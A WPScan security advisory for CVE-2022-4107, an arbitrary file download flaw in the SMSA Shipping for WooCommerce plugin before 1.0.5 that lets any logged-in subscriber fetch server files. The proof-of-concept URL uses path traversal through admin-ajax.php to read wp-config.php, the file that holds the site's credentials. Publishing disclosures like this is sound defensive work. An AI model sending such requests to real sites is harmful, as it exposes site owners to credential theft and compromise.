WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download

Description

The plugin does not have authorisation and proper CSRF checks, as well as does not validate the file to be downloaded, allowing any authenticated users, such as subscriber to download arbitrary file from the server

Proof of Concept

Open the following URL when being logged in as any user https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&filename=../../../../wp-config.php

Affects Plugins

smsa-shipping-for-woocommerce
Fixed in version 1.0.5

References

CVE
CVE-2022-4107

Classification

Type

FILE DOWNLOAD

OWASP top 10
A1: Injection
CWE
CWE-552

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
0b432858-722c-4bda-aa95-ad48e2097302

Timeline

Publicly Published

2022-11-22 (about 6 months ago)

Added

2022-11-22 (about 6 months ago)

Last Updated

2022-11-22 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin